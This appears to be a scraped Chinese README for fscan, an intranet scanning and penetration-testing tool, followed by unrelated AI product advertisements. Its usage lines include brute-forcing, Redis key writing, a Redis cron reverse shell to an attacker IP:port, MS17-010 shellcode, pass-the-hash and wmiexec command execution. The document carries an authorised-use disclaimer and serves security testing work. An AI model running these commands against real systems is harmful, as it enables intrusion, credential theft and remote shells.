[中文][url-doczh]
一款内网综合扫描工具,可方便进行一键自动化、全方位漏洞扫描。 支持主机存活探测、端口扫描、常见服务的暴力破解、MS17-010漏洞检测、Redis批量写入公钥、计划任务反弹shell、读取Windows网卡信息、Web指纹识别、Web漏洞扫描、NetBIOS探测、域控制器识别等功能。
1.信息收集:
简单用法
fscan.exe -h 192.168.1.1/24 (默认使用全部模块)
fscan.exe -h 192.168.1.1/16 (B段扫描)
其他用法
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测、不保存文件、跳过web poc扫描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub(redis写公钥)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666(redis计划任务反弹shell)
fscan.exe -h 192.168.1.1/24 -c whoami(ssh爆破成功后,命令执行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222(指定模块ssh和端口)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt(加载指定文件的用户名、密码来进行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt(指定扫描结果保存路径,默认保存在当前路径)
fscan.exe -h 192.168.1.1/8(A段的192.x.x.1和192.x.x.254,方便快速查看网段信息)
fscan.exe -h 192.168.1.1/24 -m smb -pwd password(smb密码碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010(指定模块)
fscan.exe -hf ip.txt(以文件导入)
fscan.exe -u http://baidu.com -proxy 8080(扫描单个url,并设置http代理 http://127.0.0.1:8080)
fscan.exe -h 192.168.1.1/24 -nobr -nopoc(不进行爆破,不扫Web poc,以减少流量)
fscan.exe -h 192.168.1.1/24 -pa 3389(在原基础上,加入3389->rdp扫描)
fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080(只支持简单tcp功能的代理,部分功能的库不支持设置代理)
fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add(内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具)
fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx(pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)
fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx(wmiexec无回显命令执行)
编译命令
go build -ldflags="-s -w " -trimpath main.go
upx -9 fscan.exe(可选,压缩体积)
arch用户安装
yay -S fscan-git 或者 paru -S fscan-git
完整参数
-c string
ssh命令执行
-cookie string
设置cookie
-debug int
多久没响应,就打印当前进度(默认60)
-domain string
smb爆破模块时,设置域名
-h string
目标ip: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
-hf string
读取文件中的目标
-hn string
扫描时,要跳过的ip: -hn 192.168.1.1/24
-m string
设置扫描模式: -m ssh(默认"all")
-no
扫描结果不保存到文件中
-nobr
跳过sql、ftp、ssh等的密码爆破
-nopoc
跳过web poc扫描
-np
跳过存活探测
-num int
web poc 发包速率(默认20)
-o string
扫描结果保存到哪(默认"result.txt")
-p string
设置扫描的端口: 22 | 1-65535 | 22,80,3306(默认"21,22,80,81,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017")
-pa string
新增需要扫描的端口,-pa 3389(会在原有端口列表基础上,新增该端口)
-path string
fcgi、smb远程文件路径
-ping
使用ping代替icmp进行存活探测
-pn string
扫描时要跳过的端口,如: -pn 445
-pocname string
指定web poc的模糊名字, -pocname weblogic
-proxy string
设置代理, -proxy http://127.0.0.1:8080
-user string
指定爆破时的用户名
-userf string
指定爆破时的用户名文件
-pwd string
指定爆破时的密码
-pwdf string
指定爆破时的密码文件
-rf string
指定redis写公钥用模块的文件(如: -rf id_rsa.pub)
-rs string
redis计划任务反弹shell的ip端口(如: -rs 192.168.1.1:6666)
-silent
静默扫描,适合cs扫描时不回显
-sshkey string
ssh连接时,指定ssh私钥
-t int
扫描线程(默认600)
-time int
端口扫描超时时间(默认3)
-u string
指定Url扫描
-uf string
指定Url文件扫描
-wt int
web访问超时时间(默认5)
-pocpath string
指定poc路径
-usera string
在原有用户字典基础上,新增新用户
-pwda string
在原有密码字典基础上,增加新密码
-socks5
指定socks5代理(如: -socks5 socks5://127.0.0.1:1080)
-sc
指定ms17010利用模块shellcode,内置添加用户等功能(如: -sc add)
fscan.exe -h 192.168.x.x (全功能、ms17010、读取网卡信息)
fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis 写公钥)
fscan.exe -h 192.168.x.x -c "whoami;id" (ssh 命令)
fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 一键支持xray的poc
fscan.exe -h 192.168.x.x -p 139 (netbios探测、域控识别,下图的[+]DC代表域控)
go run .\main.go -h 192.168.x.x/24 -m netbios(-m netbios时,才会显示完整的netbios信息)
go run .\main.go -h 192.0.0.0/8 -m icmp(探测每个C段的网关和数个随机IP,并统计top 10 B、C段存活数量)
本工具仅面向合法授权的企业安全建设行为,如您需要测试本工具的可用性,请自行搭建靶机环境。
为避免被恶意使用,本项目所有收录的poc均为漏洞的理论判断,不存在漏洞利用过程,不会对目标发起真实攻击和漏洞利用。
在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。请勿对非授权目标进行扫描。
如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。
在安装并使用本工具前,请您务必审慎阅读、充分理解各条款内容,限制、免责条款或者其他涉及您重大权益的条款可能会以加粗、加下划线等形式提示您重点注意。
除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要安装并使用本工具。您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。
fscan 是404团队星链计划2.0的一部分。如果您对fscan有任何疑问或想要与其他小伙伴交流,可以参考星链计划的加群方式。
如果你觉得这个项目对你有帮助,欢迎请作者喝杯饮料🍹 点击这里
https://github.com/Adminisme/ServerScan https://github.com/netxfly/x-crack https://github.com/hack2fun/Gscan https://github.com/k8gege/LadonGo https://github.com/jjf012/gopoc
[+] 2023/11/13 添加控制台彩色输出(可用-nocolor关闭)、保存文件为json格式(-json)、修改TLS最低版本为1.0、端口分组功能(-p db,web,service)。 [+] 2022/11/19 新增哈希碰撞功能、wmiexec无回显命令执行。 [+] 2022/7/14 -hf 支持host:port和host/xx:port格式,rule.Search正则匹配范围从body扩展到header+body,-nobr不再包含-nopoc。优化webtitle输出格式。 [+] 2022/7/6 加入手动GC回收,尝试节省无用内存。-url支持逗号分隔。修复一个poc模块bug。-nobr不再包含-nopoc。 [+] 2022/7/2 增强poc fuzz模块,支持扫描备份文件、目录、shiro-key(默认扫描10个key,可用-full参数扫描100个key)等。新增ms17017利用(使用参数:-sc add),可在ms17010-exp.go中自定义shellcode,内置添加用户等功能。新增poc和指纹。支持socks5代理。因body指纹更全面,默认不再扫描ico图标。 [+] 2022/4/20 poc模块增加指定目录或文件功能-pocpath,端口可以指定文件-portf port.txt,rdp模块增加多线程爆破demo,-br xx指定线程数。 [+] 2022/2/25 新增-m webonly,跳过端口扫描,直接访问http。感谢@AgeloVito [+] 2022/1/11 新增oracle密码爆破。 [+] 2022/1/7 扫描ip/8时,默认会扫描每个C段的网关和几个随机IP,推荐参数:-h ip/8 -m icmp。新增LiveTop功能,检测存活时,默认会输出存活数量最多的前10个B段和C段IP。 [+] 2021/12/7 新增rdp扫描,新增添加端口参数-pa 3389(会在原有端口列表基础上新增该端口)。 [+] 2021/12/1 优化xray解析模块,支持groups、新增poc,加入https判断(tls握手包),优化ip解析模块(支持所有ip/xx),增加爆破关闭参数-nobr,添加跳过特定IP扫描功能-hn 192.168.1.1,添加跳过特定端口扫描功能-pn 21,445,增加扫描docker未授权漏洞。 [+] 2021/6/18 改进poc机制,如果识别出指纹会根据指纹信息发送poc,如果没有识别到指纹才会发送所有poc。 [+] 2021/5/29 加入fcgi协议未授权命令执行扫描,优化poc模块,优化icmp模块,ssh模块加入私钥连接。 [+] 2021/5/15 新增win03版本(删减了xray_poc模块),增加-silent静默扫描模式,添加web指纹,修复netbios模块数组越界,添加CheckErrs字典,webtitle增加gzip解码。 [+] 2021/5/6 更新mod库、poc、指纹。修改线程处理机制、netbios探测、域控识别模块、webtitle编码模块等。 [+] 2021/4/22 修改webtitle模块,加入gbk解码。 [+] 2021/4/21 加入netbios探测、域控识别。 [+] 2021/3/4 支持-u url或-uf url.txt,对url进行批量扫描。 [+] 2021/2/25 修改yaml解析模块,支持密码爆破,如tomcat弱口令。yaml中新增sets参数,类型为数组,用于存放密码,具体参见tomcat-manager-week.yaml。 [+] 2021/2/8 增加指纹识别功能,可识别常见CMS、框架,如致远OA、通达OA等。 [+] 2021/2/5 修改icmp发包模式,更适合大规模探测。修改报错提示,-debug时,如果10秒内没有新的进展,每隔10秒就会打印一下当前进度。 [+] 2020/12/12 已加入yaml解析引擎,支持xray的Poc,默认使用所有Poc(已对xray的poc进行了筛选),可以使用-pocname weblogic,只使用某种或某个poc。需要go版本1.16以上,只能自行编译最新版go来进行测试。 [+] 2020/12/6 优化icmp模块,新增-domain参数(用于smb爆破模块,适用于域用户)。 [+] 2020/12/03 优化ip段处理模块、icmp、端口扫描模块。新增支持192.168.1.1-192.168.255.255。 [+] 2020/11/17 增加-ping参数,作用是存活探测模块用ping代替icmp发包。 [+] 2020/11/17 增加WebScan模块,新增shiro简单识别。https访问时,跳过证书认证。将服务模块和web模块的超时分开,增加-wt参数(WebTimeout)。 [+] 2020/11/16 对icmp模块进行优化,增加-it参数(IcmpThreads),默认11000,适合扫B段。 [+] 2020/11/15 支持ip以文件导入,-hf ip.txt,并对去重做了处理。 [url-docen]: README_EN.md
AI辅助编程,代码自动修复
Trae是一种自适应的集成开发环境(IDE),通过自动化和多元协作改变开发流程。利用Trae,团队能够更快速、精确地编写和部署代码,从而提高编程效率和项目交付速度。Trae具备上下文感知和代码自动完成功能,是提升开发效率的理想工具。
AI小说写作助手,一站式润色、改写、扩写
蛙蛙写作—国内先进的AI写作平台,涵盖小说、学术、社交媒体等多场景。提供续写、改写、润色等功能,助力创作者高效优化写作流程。界面简洁,功能全面,适合各类写作者提升内容品质和工作效率。
全能AI智能助手,随时解答生活与工作的多样问题
问小白,由元石科技研发的AI智能助手,快速准确地解答各种生活和工作问题,包括但不限于搜 索、规划和社交互动,帮助用户在日常生活中提高效率,轻松管理个人事务。
实时语音翻译/同声传译工具
Transly是一个多场景的AI大语言模型驱动的同声传译、专业翻译助手,它拥有超精准的音频识别翻译能力,几乎零延迟的使用体验和支持多国语言可以让你带它走遍全球,无论你是留学生、商务人士、韩剧美剧爱好者,还是出国游玩、多 国会议、跨国追星等等,都可以满足你所有需要同传的场景需求,线上线下通用,扫除语言障碍,让全世界的语言交流不再有国界。
一键生成PPT和Word,让学习生活更轻松
讯飞智文是一个利用 AI 技术的项目,能够帮助用户生成 PPT 以及各类文档。无论是商业领域的市场分析报告、年度目标制定,还是学生群体的职业生涯规划、实习避坑指南,亦或是活动策划、旅游攻略等内容,它都能提供支持,帮助用户精准表达,轻松呈现各种信息。
深度推理能力全新升级,全面对标OpenAI o1
科大讯飞的星火大模型,支持语言理解、知识问答和文本创作等多功能,适用于多种文件和业务场景,提升办公和日常生活的效率。讯飞星火是一个提供丰富智能服务的平台,涵盖科技 资讯、图像创作、写作辅助、编程解答、科研文献解读等功能,能为不同需求的用户提供便捷高效的帮助,助力用户轻松获取信息、解决问题,满足多样化使用场景。
一种基于大语言模型的高效单流解耦语音令牌文本到语音合成模型
Spark-TTS 是一个基于 PyTorch 的开源文本到语音合成项目,由多个知名机构联合参与。该项目提供了高效的 LLM(大语言模型)驱动的语音合成方案,支持语音克隆和语音创建功能,可通过命令行界面(CLI)和 Web UI 两种方式使用。用户可以根据需求调整语音的性别、音高、速度等参数,生成高质量的语音。该项目适用于多种场景,如有声读物制作、智能语音助手开发等。
AI助力,做PPT更简单!
咔片是一款轻量化在线演示设计工具,借助 AI 技术,实现从内容生成到智能设计的 一站式 PPT 制作服务。支持多种文档格式导入生成 PPT,提供海量模板、智能美化、素材替换等功能,适用于销售、教师、学生等各类人群,能高效制作出高品质 PPT,满足不同场景演示需求。
选题、配图、成文,一站式创作,让内容运营更高效
讯飞绘文,一个AI集成平台,支持写作、选题、配图、排版和发布。高效生成适用于各类媒体的定制内容,加速品牌传播,提升内容营销效果。
专业的AI公文写作平台,公文写作神器
AI 材料星,专业的 AI 公文写作辅助平台,为体制内工作人员提供高效的公文写作解决方案。拥有海量公文文库、9 大核心 AI 功能,支持 30 + 文稿类型生成,助力快速完成领导讲话、工作总结、述职报告等材料,提升办公效率,是体制打工人的得力写作神器。
最新AI工具、AI资讯
独家AI资源、AI项目落地
微信扫一扫关注公众号